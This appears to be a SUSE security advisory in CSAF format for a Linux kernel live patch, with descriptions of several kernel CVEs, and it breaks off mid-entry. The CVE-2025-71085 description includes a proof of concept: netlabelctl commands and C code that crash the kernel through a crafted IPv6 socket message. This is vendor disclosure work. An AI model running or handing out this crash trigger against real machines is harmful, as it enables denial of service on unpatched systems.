"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_47-default-14-150600.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:33:43Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1083-1
Vulnerability from csaf_suse - Published: 2026-03-26 15:03 - Updated: 2026-03-26 15:03Summary
Security update for the Linux Kernel (Live Patch 13 for SUSE Linux Enterprise 15 SP6)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 13 for SUSE Linux Enterprise 15 SP6)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.60 fixes various security issues
The following security issues were fixed:
- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1083,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1083
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
44 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 13 for SUSE Linux Enterprise 15 SP6)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.60 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40284: Bluetooth: MGMT: cancel mesh send timer when hdev removed (bsc#1257669).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1083,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1083",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1083-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1083-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261083-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1083-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024952.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257669",
"url": "https://bugzilla.suse.com/1257669"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 13 for SUSE Linux Enterprise 15 SP6)",
"tracking": {
"current_release_date": "2026-03-26T15:03:57Z",
"generator": {
"date": "2026-03-26T15:03:57Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1083-1",
"initial_release_date": "2026-03-26T15:03:57Z",
"revision_history": [
{
"date": "2026-03-26T15:03:57Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_60-default-11-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T15:03:57Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc 